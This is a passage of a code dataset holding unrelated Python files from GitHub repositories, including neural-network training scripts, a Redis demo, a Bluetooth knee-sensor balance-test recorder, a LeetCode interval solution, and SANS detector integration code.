trainer = pl.Trainer.from_argparse_args(args)\n\n # setup the dataloaders\n train_dataset = SignalTrainLA2ADataset(args.root_dir, \n subset=args.train_subset,\n fraction=tconf[\"train_fraction\"],\n half=True if args.precision == 16 else False,\n preload=args.preload,\n length=args.train_length)\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, \n shuffle=args.shuffle,\n batch_size=tconf[\"batch_size\"],\n num_workers=args.num_workers,\n pin_memory=True)\n\n val_dataset = SignalTrainLA2ADataset(args.root_dir, \n preload=args.preload,\n half=True if args.precision == 16 else False,\n subset=args.val_subset,\n length=args.eval_length)\n\n val_dataloader = torch.utils.data.DataLoader(val_dataset, \n shuffle=False,\n batch_size=8,\n num_workers=args.num_workers,\n pin_memory=True)\n\n # create the model with args\n dict_args = vars(args)\n dict_args[\"nparams\"] = 2\n\n if tconf[\"model_type\"] == 'tcn':\n dict_args[\"nblocks\"] = tconf[\"nblocks\"]\n dict_args[\"dilation_growth\"] = tconf[\"dilation_growth\"]\n dict_args[\"kernel_size\"] = tconf[\"kernel_size\"]\n dict_args[\"causal\"] = tconf[\"causal\"]\n if \"channel_width\" in tconf:\n dict_args[\"channel_width\"] = tconf[\"channel_width\"]\n model = TCNModel(**dict_args)\n elif tconf[\"model_type\"] == 'lstm':\n dict_args[\"num_layers\"] = tconf[\"num_layers\"]\n dict_args[\"hidden_size\"] = tconf[\"hidden_size\"]\n model = LSTMModel(**dict_args)\n\n # summary \n torchsummary.summary(model, [(1,65536), (1,2)], device=\"cpu\")\n\n # train!\n trainer.fit(model, train_dataloader, val_dataloader)\n","repo_name":"csteinmetz1/micro-tcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"38"} +{"seq_id":"74640633391","text":"import redis\n\ntry:\n r = redis.Redis(host='localhost',\n port=6379,\n db=0)\n r.ping() # This will attempt to ping the server, and if successful, you're connected.\n print(\"Connected to Redis\")\n\n r.set('foo', 'bar') # create record\n value = r.get('foo') # read record\n\n print(value) # bar\nexcept redis.ConnectionError:\n print(\"Could not connect to Redis\")\n","repo_name":"Ruslan-Skira/goit_web","sub_path":"module08/lesson02/from_lecture/redis_l.py","file_name":"redis_l.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"29033891744","text":"# Author: Group 23 (Miguel, Akanksha, Dorian)\n# Date: March 12th 2023\n# Purpose: Showcase how to use the DataReceive.py library\n\n\nimport DataReceive # Name of the file containing the bluetooth serial object\nimport time\nimport matplotlib.pyplot as plt\nimport keyboard\nfrom email_setup import *\nfrom processing_funcs import *\nfrom plotting import *\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n# setting clinician email\nclinician_email = 'knighd7@mcmaster.ca' # 'martim96@mcmaster.ca'#'nehetea@mcmaster.ca'\n\n# READ THIS COMMENT OR ELSE THERE WILL BE PROBLEMS\n\n'''Make sure to check the value of bluetoothCommObject.successfullConnect\nThis value will tell you if you're connected or not - please build a contingency plan\nin case connection is not successfully established (whether that is try again or raise some exception\n\nNote: you only need to check if the connection was successfully established at the start as the connection persists as long as the object is alive'''\n\n# Make the bluetooth object that 
will establish the connection and send back data\n\nbluetoothCommObject = DataReceive.bluetoothTelephone()\nif bluetoothCommObject.successfullConnect:\n    print(\"Connection was successfully established \\n\")\nelse:\n    print(\"Connection was not successfully established\")\n\n\n# initializing arrays for holding angle data from each direction of the SEBT test for nonoperative leg\nanterior_SEBT_nonop = []\nanterolateral_SEBT_nonop = []\nanteromedial_SEBT_nonop = []\nlateral_SEBT_nonop = []\nmedial_SEBT_nonop = []\nposterolateral_SEBT_nonop = []\nposteromedial_SEBT_nonop = []\nposterior_SEBT_nonop = []\n\n# initializing arrays for holding angle data from each direction of the SEBT test for operative leg\nanterior_SEBT_op = []\nanterolateral_SEBT_op = []\nanteromedial_SEBT_op = []\nlateral_SEBT_op = []\nmedial_SEBT_op = []\nposterolateral_SEBT_op = []\nposteromedial_SEBT_op = []\nposterior_SEBT_op = []\n\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for nonoperative leg\nanterior_CofMs_nonop = []\nanterolateral_CofMs_nonop = []\nanteromedial_CofMs_nonop = []\nlateral_CofMs_nonop = []\nmedial_CofMs_nonop = []\nposterolateral_CofMs_nonop = []\nposteromedial_CofMs_nonop = []\nposterior_CofMs_nonop = []\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for operative leg\nanterior_CofMs_op = []\nanterolateral_CofMs_op = []\nanteromedial_CofMs_op = []\nlateral_CofMs_op = []\nmedial_CofMs_op = []\nposterolateral_CofMs_op = []\nposteromedial_CofMs_op = []\nposterior_CofMs_op = []\n\n\n# function for conducting each stage of the SEBT test\ndef conduct_stage(stage_array: list[float], leg: str, CofM_array: list[tuple], stage_name: str):\n    while True:\n\n        # Call the get data function - it will return an array containing the load cell values and knee angle\n        loadcells, bno, emg = bluetoothCommObject.getData()\n\n        print(\"Raw Loadcell Values\" + str(loadcells))\n        # print(emg)\n        print(\"Knee angle: \" + str(bno))\n\n        # calculating center of mass value\n        XCofM, YCofM = get_Cof_M(loadcells)\n\n        # printing x and y values of center of mass for debugging purposes\n        print('Center of Mass: (' + str(XCofM) + ',' + str(YCofM) + ')')\n\n        # adding data to arrays for later plotting\n        stage_array.append(bno)\n        CofM_array.append((XCofM, YCofM))\n\n        time.sleep(0.150)  # sleep for 150 ms between samples\n\n        if keyboard.is_pressed(' '):\n            print(\n                f\"SEBT test in the {stage_name} direction finished on the {leg} leg.\")\n            break\n\n\n# first stage of SEBT test (anterior) on non-operative leg\ninput('Ready for anterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_nonop, 'non-operative',\n              anterior_CofMs_nonop, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# second stage of SEBT test (anteromedial) on non-operative leg\ninput('Ready for anteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_nonop, 'non-operative',\n              anteromedial_CofMs_nonop, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on non-operative leg\ninput('Ready for anterolateral orientation SEBT test on the non-operative leg? 
Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_nonop, 'non-operative',\n              anterolateral_CofMs_nonop, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on non-operative leg\ninput('Ready for lateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_nonop, 'non-operative',\n              lateral_CofMs_nonop, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on non-operative leg\ninput('Ready for posterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_nonop, 'non-operative',\n              posterolateral_CofMs_nonop, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on non-operative leg\ninput('Ready for posterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_nonop, 'non-operative',\n              posterior_CofMs_nonop, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteromedial) on non-operative leg\ninput('Ready for posteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posteromedial direction.')\nconduct_stage(posteromedial_SEBT_nonop, 'non-operative',\n              posteromedial_CofMs_nonop, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on non-operative leg\ninput('Ready for medial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_nonop, 'non-operative', medial_CofMs_nonop, 'medial')\nprint(\"SEBT testing for the non-operative leg finished. Please place the apparatus on the operative leg in order to conduct the test again.\")\n\n# first stage of SEBT test (anterior) on operative leg\ninput('Ready for anterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_op, 'operative',\n              anterior_CofMs_op, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# second stage of SEBT test (anteromedial) on operative leg\ninput('Ready for anteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_op, 'operative',\n              anteromedial_CofMs_op, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on operative leg\ninput('Ready for anterolateral orientation SEBT test on the operative leg? 
Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_op, 'operative',\n anterolateral_CofMs_op, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on operative leg\ninput('Ready for lateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_op, 'operative',\n lateral_CofMs_op, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on operative leg\ninput('Ready for posterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_op, 'operative',\n posterolateral_CofMs_op, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on operative leg\ninput('Ready for posterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_op, 'operative',\n posterior_CofMs_op, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteromedial) on operative leg\ninput('Ready for posteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posteromedial direction.')\nconduct_stage(posteromedial_SEBT_op, 'operative',\n posteromedial_CofMs_op, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on operative leg\ninput('Ready for medial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_op, 'operative', medial_CofMs_op, 'medial')\nprint(\"SEBT testing for the operative leg finished. 
Please remove the apparatus.\")\n\n\n# collecting per-direction results for plotting and email\nSEBT_data = {\n 'Anterior': [anterior_SEBT_op, anterior_SEBT_nonop],\n 'Anterolateral': [anterolateral_SEBT_op, anterolateral_SEBT_nonop],\n 'Anteromedial': [anteromedial_SEBT_op, anteromedial_SEBT_nonop],\n 'Lateral': [lateral_SEBT_op, lateral_SEBT_nonop],\n 'Medial': [medial_SEBT_op, medial_SEBT_nonop],\n 'Posterolateral': [posterolateral_SEBT_op, posterolateral_SEBT_nonop],\n 'Posteromedial': [posteromedial_SEBT_op, posteromedial_SEBT_nonop],\n 'Posterior': [posterior_SEBT_op, posterior_SEBT_nonop]\n}\n\nCofM_data = {\n 'Anterior': [anterior_CofMs_op, anterior_CofMs_nonop],\n 'Anterolateral': [anterolateral_CofMs_op, anterolateral_CofMs_nonop],\n 'Anteromedial': [anteromedial_CofMs_op, anteromedial_CofMs_nonop],\n 'Lateral': [lateral_CofMs_op, lateral_CofMs_nonop],\n 'Medial': [medial_CofMs_op, medial_CofMs_nonop],\n 'Posterolateral': [posterolateral_CofMs_op, posterolateral_CofMs_nonop],\n 'Posteromedial': [posteromedial_CofMs_op, posteromedial_CofMs_nonop],\n 'Posterior': [posterior_CofMs_op, posterior_CofMs_nonop]\n}\n\n\nfor item in SEBT_data:\n plot_SEBT_graph(SEBT_data[item][0], SEBT_data[item][1], item)\nprint(\"graphs saved to folder\")\n\n# debugging, remove later\n#print(SEBT_data)\n\n# debugging, remove later\n#print(CofM_data)\n\n# saving CofM images to folder\nfor item in CofM_data:\n plot_CofM_deviations(CofM_data[item][0], CofM_data[item][1], item)\n\n\n# getting filenames to send as attachments\nanglefiles = ['sebt/' + f for f in listdir('sebt') if isfile(join('sebt', f))]\nCofMfiles = ['CofM_images/' +\n f for f in listdir('CofM_images') if isfile(join('CofM_images', f))]\n\nfile_names = anglefiles + CofMfiles\n\nsend_emails([clinician_email], file_names, SEBT_data, CofM_data)\n","repo_name":"DorianKnight/IBEHS-3P04-ACL-Reconstruction","sub_path":"Testreceive.py","file_name":"Testreceive.py","file_ext":"py","file_size_in_byte":11797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41538224999","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#np.random.seed(1234)\n#print(np.random.randn(4))\n\nX = np.array([[147, 150, 153, 158, 163, 165, 168, 170, 173, 175, 178, 180, 183]]).transpose()\ny = np.array([[5, 6, 7, 8, 9, 10]])\none = np.ones((X.shape[0], 1))\ntest = np.concatenate((one, X), axis = 1)\nprint(X)\nprint(test)","repo_name":"phamquanganhBKSET/machine_learning","sub_path":"math/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40600068606","text":"# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n\n n = len(intervals)\n overlap = 0 # number of intervals that overlap the new one\n i = 0\n while i < n:\n # 1. if the new interval ends before the current interval starts, stop scanning\n if newInterval.end < intervals[i].start:\n break\n # 2. if the new interval starts after the current interval ends, skip it\n elif newInterval.start > intervals[i].end:\n pass\n # 3. 
if the new interval overlaps the current interval, merge them\n else:\n newInterval.start = min(intervals[i].start, newInterval.start)\n newInterval.end = max(intervals[i].end, newInterval.end)\n overlap += 1\n i += 1\n\n # drop the intervals merged into the new one (a no-op when overlap == 0)\n # and insert the (possibly merged) new interval at the right position\n intervals = intervals[:i-overlap] + intervals[i:]\n intervals.insert(i - overlap, newInterval)\n return intervals\n \n \n \nintervals = []\ntmp = Interval(1,3)\nintervals.append(tmp)\ntmp = Interval(6,9)\nintervals.append(tmp)\n# tmp = Interval(2,6)\n# intervals.append(tmp)\n# tmp = Interval(15,18)\n# intervals.append(tmp)\n\nnewInterval = Interval(0, 1)\n\ns = Solution()\nr = s.insert(intervals, newInterval)\nfor i in range(len(r)):\n\tprint(r[i].start, r[i].end)","repo_name":"Rosevil1874/LeetCode-Solution-Python-Java","sub_path":"Python-Solution/57_Insert-Interval/57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"38"} +{"seq_id":"7564592868","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Write a Python program to get the third side of a right-angled triangle from two given sides\n\n# In[1]:\n\n\nfrom math import sqrt\n\n\n# In[ ]:\n\n\nprint('Enter length of two given sides')\na = float(input('Enter a :'))\nb = float(input('Enter b :'))\nc = sqrt(a**2 + b**2)\nprint('The length of third side', c)\n","repo_name":"RohitDhuriya/Internship","sub_path":"Python worksheet 1 Q no.14 (1).py","file_name":"Python worksheet 1 Q no.14 (1).py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22046323536","text":"import os\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as utils\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom models import DnCNN\nfrom dataset import prepare_data, Dataset\nfrom utils import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# argument parsing\nparser = argparse.ArgumentParser(description=\"DnCNN\")\nparser.add_argument(\"--preprocess\", type=bool, default=False, help='run prepare_data or not')\nparser.add_argument(\"--batchSize\", type=int, default=64, help=\"Training batch size\")\nparser.add_argument(\"--num_of_layers\", type=int, default=17, help=\"Number of total layers\")\nparser.add_argument(\"--epochs\", type=int, default=50, help=\"Number of training epochs\")\nparser.add_argument(\"--milestone\", type=int, default=30, help=\"When to decay learning rate; should be less than epochs\")\nparser.add_argument(\"--lr\", type=float, default=1e-3, help=\"Initial learning rate\")\nparser.add_argument(\"--outf\", type=str, default=\"train_logs\", help='path of log files')\nparser.add_argument(\"--logdir\", type=str, default=\"test_logs\", help='path of log files')\nparser.add_argument(\"--noiseL\", type=float, default=25, help='noise level')\nparser.add_argument(\"--val_noiseL\", type=float, default=25, help='noise level used on validation set')\nopt = parser.parse_args()\n\n\ndef main():\n # Load dataset\n print('Loading dataset ...\\n')\n dataset_train = Dataset(train=True)\n dataset_val = Dataset(train=False)\n loader_train = DataLoader(dataset=dataset_train, num_workers=4, batch_size=opt.batchSize, shuffle=True)\n print(\"# of training samples: 
%d\\n\" % int(len(dataset_train)))\n # Build model\n net = DnCNN(channels=1, num_of_layers=opt.num_of_layers) # 实例化网络,通道数为1(针对灰度图像)\n net.apply(weights_init_kaiming) # 权重初始化\n criterion = nn.MSELoss(reduction='sum') # loss标准为L2均方和\n # Move to GPU\n device_ids = [0]\n model = nn.DataParallel(net, device_ids=device_ids).cuda()\n criterion.cuda()\n # Optimizer\n optimizer = optim.Adam(model.parameters(), lr=opt.lr) # 使用Adam优化算法\n # training\n writer = SummaryWriter(opt.outf) # 记录训练logs\n step = 0\n for epoch in range(opt.epochs):\n if epoch < opt.milestone:\n current_lr = opt.lr\n else: # 当周期数超过milestone,衰减学习率,防止过拟合\n current_lr = opt.lr / 10.\n # set learning rate\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = current_lr\n print('learning rate %f' % current_lr)\n # train\n for i, data in enumerate(loader_train, 0):\n # training step\n model.train() # 训练模式,确保BN参数在训练过程中更新\n model.zero_grad() # 初始化模型梯度\n optimizer.zero_grad() # 初始化优化器梯度\n img_train = data\n noise = torch.FloatTensor(img_train.size()).normal_(mean=0, std=opt.noiseL / 255.) # 生成加性白噪声\n imgn_train = img_train + noise # 生成噪声图像\n img_train, imgn_train = Variable(img_train.cuda()), Variable(imgn_train.cuda()) # 激活GPU计算\n noise = Variable(noise.cuda())\n out_train = model(imgn_train) # 应用模型\n loss = criterion(out_train, noise) / (imgn_train.size()[0] * 2) # 计算loss\n loss.backward() # 反向传播\n optimizer.step() # 更新网络参数\n # results\n model.eval() # 测试模式,确保BN参数在训练过程中不变\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.) # 归一化\n psnr_train = batch_PSNR(out_train, img_train, 1.) # 计算信噪比\n print(\"[epoch %d][%d/%d] loss: %.4f PSNR_train: %.4f\" %\n (epoch + 1, i + 1, len(loader_train), loss.item(), psnr_train))\n if step % 10 == 0:\n # Log the scalar values\n writer.add_scalar('loss', loss.item(), step)\n writer.add_scalar('PSNR on training data', psnr_train, step)\n step += 1\n ## the end of each epoch\n model.eval()\n # validate\n psnr_val = 0 # 平均信噪比\n for k in range(len(dataset_val)):\n img_val = torch.unsqueeze(dataset_val[k], 0) # 增加维度\n noise = torch.FloatTensor(img_val.size()).normal_(mean=0, std=opt.val_noiseL / 255.)\n imgn_val = img_val + noise # 生成加性白噪声图像\n with torch.no_grad(): # 节省显存\n img_val, imgn_val = Variable(img_val.cuda()), Variable(imgn_val.cuda())\n out_val = torch.clamp(imgn_val - model(imgn_val), 0., 1.)\n psnr_val += batch_PSNR(out_val, img_val, 1.)\n psnr_val /= len(dataset_val) # 计算平均信噪比\n print(\"\\n[epoch %d] PSNR_val: %.4f\" % (epoch + 1, psnr_val))\n writer.add_scalar('PSNR on validation data', psnr_val, epoch + 1)\n # log the images\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.)\n Img = utils.make_grid(img_train.data, nrow=8, normalize=True, scale_each=True) # 原图像网格\n Imgn = utils.make_grid(imgn_train.data, nrow=8, normalize=True, scale_each=True) # 噪声图像网格\n Irecon = utils.make_grid(out_train.data, nrow=8, normalize=True, scale_each=True) # 降噪图像网格\n writer.add_image('clean image', Img, epoch)\n writer.add_image('noisy image', Imgn, epoch)\n writer.add_image('reconstructed image', Irecon, epoch)\n # save model\n torch.save(model.state_dict(), os.path.join(opt.outf, 'net.pth'))\n torch.save(model.state_dict(), os.path.join(opt.logdir, 'net.pth'))\n\n\nif __name__ == \"__main__\":\n if opt.preprocess: # 如需要,进行数据集预处理\n prepare_data(data_path='data', patch_size=40, stride=10, aug_times=1)\n main()\n","repo_name":"joeyscave/cv","sub_path":"lab 2 : Image Denosing/lab2 : Image 
DeNoising/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27305195591","text":"from tkinter import Tk\n\nfrom app.ui.application_ui import ApplicationUi\n\n\ndef start_app():\n root = Tk()\n root.minsize(width=800, height=600)\n app = ApplicationUi(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n start_app()\n","repo_name":"oallaire/assembly-pdf-generator","sub_path":"app/app_main.py","file_name":"app_main.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70130360750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 27 21:47:30 2023\n\n@author: lutzbueno_v\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom utils import load_hdf\nimport re\nimport plot_integration as plot_integ\nfrom utils import create_analysis_folder\nfrom utils import save_results\nfrom correction import prepare_corrections\nfrom correction import load_standards\nfrom correction import load_and_normalize\nfrom correction import correct_dark\nfrom correction import correct_EC\nfrom calibration import absolute_calibration\n\n\ndef set_integration(config, result):\n # find all files in the folder\n path_dir_an = create_analysis_folder(config)\n list_dir = list(os.listdir(path_dir_an))\n force_reintegrate = config['analysis']['force_reintegrate']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n for folder_name in list_dir:\n if folder_name[0:3] == 'det':\n det = folder_name[4:]\n path_det = os.path.join(path_dir_an, str(folder_name))\n # create poni and masks\n path_rad_int = os.path.join(path_det, 'integration/')\n if not os.path.exists(path_rad_int):\n os.mkdir(path_rad_int)\n # name the sample\n path = path_rad_int\n prefix = 'radial_integ'\n class_file = result['overview']['det_files_' + det]\n scanNr = class_file['scan'][-1]\n sample_name = class_file['sample_name'][-1]\n frame = 0\n sufix = 'dat'\n last_file = make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame)\n # check if we want to integrate\n if os.path.exists(last_file) and force_reintegrate == 0:\n print('All files are already integrated at ' + det + 'm')\n else:\n prepare_corrections(config, result, det)\n if perform_abs_calib == 1:\n result = load_standards(config, result, det)\n result = integrate(config, result, det, path_rad_int)\n return result\n\ndef make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame):\n file_n = path + prefix + '_' + f\"{scanNr:07d}\" + '_'+ f\"{frame:05d}_\" + sample_name + '_' +'det' + det + 'm'+ '.' 
+ sufix\n return file_n\n\ndef integrate(config, result, det, path_rad_int):\n plt.ioff()\n path_hdf_raw = config['analysis']['path_hdf_raw']\n class_file = result['overview']['det_files_'+ det]\n # correct to absolute scale\n perform_abs_calib = config['analysis']['perform_abs_calib']\n perform_azimuthal = config['analysis']['perform_azimuthal']\n perform_radial = config['analysis']['perform_radial']\n\n # pixel range defines how many q the final curve will contain\n pixel_range = range(0, 100)\n result['integration']['pixel_range'] = pixel_range\n # execute the corrections for all\n print('DOING ' + str(det) + 'm')\n for ii in range(0, len(class_file['sample_name'])):\n name_hdf = class_file['name_hdf'][ii]\n sample_name = class_file['sample_name'][ii]\n scanNr = class_file['scan'][ii]\n # do radial integration for each frame\n for ff in range(0, class_file['frame_nr'][ii]):\n if perform_abs_calib == 1:\n dark = result['integration']['cadmium']\n img = load_and_normalize(config, result, name_hdf)\n # Subtract empty cell and Cadmium\n img_cell = result['integration']['empty_cell']\n # subtraction of the empty cell\n if class_file['frame_nr'][ii] > 1:\n img1 = correct_dark(img[ff,:,:], dark)\n img1 = correct_EC(img1, img_cell)\n else:\n img1 = correct_dark(img, dark)\n img1 = correct_EC(img1, img_cell)\n print('Corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\n else:\n img = load_hdf(path_hdf_raw, name_hdf, 'counts')\n if class_file['frame_nr'][ii] > 1:\n img1 = img[ff,:,:]\n else:\n img1 = img\n print('NOT corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\n img1 = np.squeeze(img1)\n # get the frame number\n frame = ff\n # radial integration\n if perform_radial == 1:\n # name the sample\n prefix = 'pattern2D'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n np.savetxt(file_name, img1, delimiter=',')\n # name the sample\n prefix = 'radial_integ'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n radial_integ(config, result, img1, file_name)\n if perform_azimuthal == 1:\n # name the sample\n prefix = 'azim_integ'\n sufix = 'dat'\n file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\n azimuthal_integ(config, result, img1, file_name)\n plot_radial_integ(config, result, file_name)\n return result\n\n\ndef radial_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # integrate for radial plots\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model=\"azimuthal\",\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model=\"azimuthal\",\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n # save the integrated files\n data_save = np.column_stack((q, I, sigma))\n header_text = 'q (A-1), absolute intensity I (1/cm), standard deviation'\n 
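# np.savetxt writes header_text as a '# '-prefixed header line above the three data columns\n 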
np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\n\ndef azimuthal_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # define the number of sectors\n sectors_nr = 16\n # integrate for azimuthal plots\n npt_azim = range(0, 370, int(360/sectors_nr))\n result['integration']['sectors_nr'] = sectors_nr\n result['integration']['npt_azim'] = npt_azim\n for rr in range(0, len(npt_azim)-1):\n azim_start = npt_azim[rr]\n azim_end = npt_azim[rr+1]\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n if rr == 0:\n I_all = I\n sigma_all = sigma\n else:\n I_all = np.column_stack((I_all,I))\n sigma_all = np.column_stack((sigma_all, sigma))\n #save the integrated data\n data_save = np.column_stack((q, I_all, sigma_all))\n header_text = 'q (A-1), ' + str(sectors_nr) + ' columns for absolute intensity I (1/cm), '+ str(sectors_nr) + ' columns for standard deviation'\n np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\ndef plot_radial_integ(config, result, file_name):\n # plot and save the results\n if config['analysis']['plot_azimuthal'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_azimuthal(config, result, ScanNr, Frame)\n\n if config['analysis']['plot_radial'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_radial(config, result, ScanNr, 